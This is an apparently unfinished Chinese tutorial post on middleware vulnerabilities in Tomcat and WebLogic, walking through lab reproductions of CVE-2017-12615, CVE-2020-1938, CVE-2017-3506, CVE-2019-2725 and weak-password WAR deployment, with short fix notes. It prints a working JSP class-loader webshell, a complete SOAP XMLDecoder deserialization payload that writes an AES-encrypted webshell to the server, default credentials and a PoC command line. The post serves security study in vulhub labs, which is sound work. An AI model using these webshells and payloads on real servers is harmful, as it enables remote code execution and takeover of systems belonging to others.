常见中间件漏洞大全及其修复方法(未完成)

news2024/12/27 10:48:12

一.Tomcat

      tomcat 是一个开源而且免费的 jsp 服务器,默认端口 : 8080 ,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置 JSP Java Server Page )和 JAVA 系统必备的一款环境。

1.1 CVE-2017-12615

Tomcat put方法任意文件写入漏洞

      当 Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为false ),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP文件,JSP 文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

漏洞复现

首先我们自己用docker的vulhub搭建一个tomcat环境,默认是8080端口,命令如下

cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d

访问后进入如下页面

开启抓包后刷新一下这个页面,然后在数据包中将请求方式改为PUT,并在/后面加上要上传的文件名+/,然后在数据包最后一行空一行,填入上传文件的内容,这里我上传了一个1.jsp文件,内容是jsp的一句话木马(到网上搜的),修改完成后点击放行

然后继续到浏览器中访问并用蚁剑连接

如何修复

设置 readonly true

1.2后台弱口令部署war

      在tomcat8环境下默认进入后台的密码为 tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令。

漏洞复现

首先我们去利用docker搭建一个vulhub环境,命令如下

cd /etc/vunhub/tomcat/tomcat8
docker-compose up -d

我们去访问页面,点击manager app后会弹出一个登录框让我们登录,这里是一个弱口令(如果没设置过),账号和密码都是tomcat

登陆进去后往下滑,这里有一个上传文件的地方,可以上传war包

然后我们就去制作一个war包,首先创建一个jsp文件,内容为之前找到的jsp一句话木马

然后将其压缩,并将后缀名改为war,保存后上传

上传成功后即可看到我们上传的文件

点击访问后会弹出404,但是再加一个1.jsp目录,即可正常访问

然后用蚁剑连接成功

如何修复

1. 设置强口令: conf/tomcat-users.xml
<user username="tomcat" password="tomcat" roles="manager
gui,manager script,manager-jmx,manager-status,admin-gui,admin-script" />
2. 删除 manger 文件

1.3CVE-2020-1938

      由于 Tomcat AJP 协议设计上的缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有Webapp目录下的任意文件, 从而 可以读取webapp 配置文件或源码文件。 此外如果目标应用有文件上传的功能情况下,配合为文件包含漏洞利用GetShell

漏洞复现

tomcat默认的conf/server.xml中配置了2个Connector,一个为 8080 的对外提供的HTTP协议端口另外一个就是默认的 8009 AJP协议端口,两个端口默认均监听在外网ip。

搭建环境命令如下

cd etc/vulhub/tomcat/CVE-2020-1938
docker-compose up -d

然后我们还需要下载一个漏洞利用的poc包,下载到kali中,链接为

https://github.com/0nise/CVE-2020-1938

打开后有如下几个文件,我们利用如下语句对目标进行poc,就可以任意查看文件内容

python CVE-2020-1938.py -p 8009 -f 目录文件名 IP

如何修复

1.更新到最新版本
2.关闭AJP服务,修改Tomcat配置文件Service.xml,注释掉。<Connectorport="8009"protocol="AJP/1.3" redirectPort="8443" />

3.配置ajp配置中的secretRequired跟secret属性来限制认证。

二.WebLogic

      WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

2.1后台弱口令GetShell

通过弱口令进入后台界面,上传部署war包,getshell

漏洞复现

首先搭建环境,命令如下

cd vulhub-master/weblogic/weak_password
docker-compose up -d

然后访问目标的/console/login/LoginForm.jsp 目录进入一个登陆界面,这里的默认账号密码是weblogic/Oracle@123,我们直接登录

如果出现如下页面,点击主页即可成功登录

然后在主页中点击部署里的安装,然后就可以上传文件了

我们直接上传一个之前制作的war包,jsp木马压缩成zip,修改后缀为war,上传

上传完成后访问我们名为1的war包下的1.jsp文件,成功访问

然后用蚁剑连接

漏洞修复

修改密码为复杂密码

2.2 CVE-2017-3506反序列化漏洞

      Weblogic WLS Security 组件对外提供了 webserver 服务,其中使用了 XMLDecoder 来解析用户输入的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执行。

漏洞复现

搭建环境命令如下,与2.1中用的环境相同

cd vulhub-master/weblogic/weak_password
docker-compose up -d
访问以下目录中的一种,如果有回显如下图,则可以判断 wls-wsat 组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
然后这里可以利用抓包然后 添加请求包,在标签之间分别写存放 jsp 的路径和要写入的 shell来获取shell,也可以直接利用工具,我这里利用工具,在地址中填写目标url然后点击检查即可检测漏洞
此处检测出有漏洞后,点击文件上传,将我们之前搜到的jsp一句话木马复制粘贴上去,然后点击上传文件
一句话木马如下
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

显示上传完成后,在工具下方会显示上传文件的路径,我们直接去访问
发现成功访问后用蚁剑连接

漏洞修复

更新到最新版本,打上 10271 的补丁 , 对访问 wls-wsat 的资源进行访问控制 

2.3 CVE-2019-2725

      wls9-async 等组件为 WebLogic Server 提供异步通讯服务,默认应用于 WebLogic 部分版本。由于该 WAR 包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。

漏洞复现

搭建环境命令如下(与前面一样)

cd vulhub-master/weblogic/weak_password
docker-compose up -d
搭建完成后访问 /_async/AsyncResponseService 目录,出现如下页面则访问成功,存在漏洞
然后开启抓包,再次访问此页面,先右键将请求方法get改为post
写入shell如下,然后放包
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header>
<wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext
xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131"
class="java.beans.xmlDecoder"><object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/
webshell.jsp</string><void method="println"><string><![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U
extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST"))
{String k="e45e329feb5d925b";session.putValue("u",k);Cipher
c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new
U(this.getClass().getClassLoader()).g(c.doFinal(new
sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta
nce().equals(pageContext);}%>]]>
</string></void><void method="close"/></object></java></work:WorkContext>
</soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>
</soapenv:Envelope>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1984756.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Transformers 中的Softmax 和 Layer Norm 如何并行?

1.Softmax 如何并行&#xff1f; Softmax 计算公式&#xff1a; 安全的 Softmax 运算&#xff1a; softmax 有个问题&#xff0c;那就是很容易溢出。比如采用半精度&#xff0c;由于float16的最大值为65504&#xff0c;所以只要x>11&#xff0c;那么softmax就溢出了。即使是…

C语言新手小白详细教程(6)函数

希望文章能够给到初学的你一些启发&#xff5e; 如果觉得文章对你有帮助的话&#xff0c;点赞 关注 收藏支持一下笔者吧&#xff5e; 阅读指南&#xff1a; 开篇说明为什么要使用函数&#xff1f;1.定义一个函数2.调用函数3.定义函数详解 开篇说明 截止目前&#xff0c;我们已…

华清IOday7 24-8-5

文章目录 使用有名管道实现&#xff0c;一个进程用于给另一个进程发消息&#xff0c;另一个进程收到消息后&#xff0c;展示到终端上&#xff0c;并且将消息保存到文件上一份使用有名管道实现两个进程间相互通信 使用有名管道实现&#xff0c;一个进程用于给另一个进程发消息&a…

服务器数据恢复—raid5阵列上层Oracle数据库数据恢复案例

服务器数据恢复环境&故障&#xff1a; 一台服务器上有8块SAS硬盘&#xff0c;其中的7块硬盘组建了一组RAID5阵列&#xff0c;另外1块硬盘作为热备盘使用。划分了6个LUN&#xff0c;服务器上部署有oracle数据库。 RAID5磁盘阵列中有2块硬盘出现故障并离线&#xff0c;RAID5阵…

浮点数在计算机中的编码方式

一、前言 我们常能听到&#xff0c;直接用浮点数做运算得出的结果是不准确的了&#xff1b;或者也能看到涉及到浮点数时&#xff0c;会出现一些奇奇怪怪的问题&#xff0c;比如&#xff1a; public class DecimalTest {public static void main(String[] args) {float f1 1.…

STK12.2+Python开发(二):添加访问约束,新建场景、卫星、地面站等,获取当前场景的信息

新建场景 1.获取当前打开的场景 #获取当前打开的场景 scenario root.CurrentScenario2.设置当前场景的时间 scenario.SetTimePeriod(Today,24hr)3.添加一个地面目标到当前的场景 scenario.SetTimePeriod(Today,24hr)4.添加一个地面目标到当前的场景&#xff0c;括号内是三…

空气质量传感器 - 从零开始认识各种传感器【二十八期】

空气质量传感器|从零开始认识各种传感器 1、什么是空气质量传感器&#xff1f; 空气质量传感器是一种检测空气中污染物浓度的设备&#xff0c;广泛应用于环境监测、智能家居、工业控制和健康管理等领域。 2、空气质量传感器是如何工作的&#xff1f; 对于每个人都关心的空气质…

效率何止10倍!利用输入法瞬间调用提示词

我们在日常工作/学习/生活有很多场景需要使用提示词&#xff0c;比如说&#xff1a; 快速总结文章快速排版解释概念翻译其它经常面对的任务 但是使用提示词有几个痛点&#xff1a; 你很难临时写一个非常完整的提示词你凑合写的提示词&#xff0c;又担心结果不满意如果已经保…

前端使用css动画绘制简易的进度条,数据多条的时候可以切换

文章目录 一、效果图二、使用步骤1.公共的进度条组件2.使用 总结 一、效果图 二、使用步骤 1.公共的进度条组件 我这里命名的progressBar.vue&#xff0c; 你们使用的时候直接复制粘贴到自己的项目里面即可。 文件中代码如下&#xff08;示例&#xff09;&#xff1a; <t…

EasyX 碰撞检测

代码&#xff1a; #define _UNICODE #define UNICODE#include <array> #include <cmath> #include <ctime> #include <format> #include <graphics.h> #include <vector>typedef struct tagRECTF {double left;double top;double right;d…

You Only Look Once:Unified, Real-Time Object Detection 论文阅读

论文名&#xff1a;You Only Look Once:Unified, Real-Time Object Detection 论文作者&#xff1a;Joseph Redmon et.al. 期刊/会议名&#xff1a;CVPR 2016 发表时间&#xff1a;2016-5 ​论文地址&#xff1a;https://arxiv.org/pdf/1506.02640 1.摘要 我们提出了一种新的目…

论文辅导 | 结合变种残差模型和 Transformer 的城市公路短时交通流预测

辅导文章 模型描述 城市公路交通流的预测受到历史交通流量和相邻车道交通流量的影响&#xff0c;蕴含了复杂的时空特征。针对传统交通流预测模型卷积长短时记忆网络(ConvLSTM)进行交通流预测时&#xff0c;未将时空特征分开提取而造成的提取不充分、特征信息混淆和特征信息缺失…

视频融合技术

三维视频融合技术遵循数字孪生多源数据融合的原则&#xff0c;比视频窗口、矩阵更加直观高效&#xff0c;省去了人脑理解空间的时间&#xff0c;可有效提升数字孪生城市在物联感知操作、虚实融合交互等方面的能力&#xff0c;动静一体、虚实结合&#xff0c;让三维场景“动起来…

常见的SQL注入

联合查询 如下&#xff0c;要求我们传入一个id值过去。传参?id1&#xff0c;当我们输入id1和id2时&#xff0c;页面中name值和password的值会发生变化&#xff0c;说明此时我们输入的数据和数据库有交互并且将数据显示在屏幕上了 输入?id1&#xff0c;页面发生报错&#xf…

手机联网如何设置动态ip

在现代社会&#xff0c;手机已成为我们日常生活中不可或缺的一部分&#xff0c;无论是工作、学习还是娱乐&#xff0c;都离不开网络的支持。而在手机联网的过程中&#xff0c;IP地址的分配方式显得尤为重要。动态IP地址因其灵活性和安全性&#xff0c;成为了许多用户的首选。那…

电子合同怎么制作?9款常用电子合同软件

文章将介绍了以下9个工具&#xff1a;e签宝、文书宝、签通云、快签宝、法天使、Zycus iContract、airSlate WorkFlow、Lightico、KeepSolid Sign。 在数字化快速发展的今天&#xff0c;电子合同成为了业务操作中不可或缺的一部分&#xff0c;但许多人仍然面临如何有效创建和管理…

Redis vs Memcached:Redis的三大优势

Redis vs Memcached&#xff1a;Redis的三大优势 1. 数据类型2. 数据持久化能力3. 高性能与灵活性 &#x1f496;The Begin&#x1f496;点点关注&#xff0c;收藏不迷路&#x1f496; 1. 数据类型 Redis&#xff1a;支持多样化的数据类型&#xff0c;包括字符串&#xff08;S…

前端性能优化-回流与重绘

前言 本文总结回流与重绘相关的知识点 回流与重绘的基本概念 重绘&#xff08;Repaint&#xff09;&#xff1a; 当元素样式发生改变&#xff0c;但不影响其几何属性的时候&#xff0c;浏览器只需要重新绘制这个元素&#xff0c;这个过程被称为重绘。 回流&#xff08;Refl…

Linux_监测CPU和内存

通过TOP持续获取进程的CPU和内存消耗&#xff0c;并写入到表格 # 配置进程名 processvm-agent # 配置次数 number100 # 配置间隔时间 time5 # csv结果文件 filecm_$(date %s).csv echo "%CPU,%MEM">${file} pid$(ps -aux | grep ${process} | awk -F {OFS"…

debug\moc\mocinclude.tmp dose not exist

先把jom禁用&#xff0c;然后清理工程&#xff0c;重新编译&#xff0c;编译通过后再重新打开jom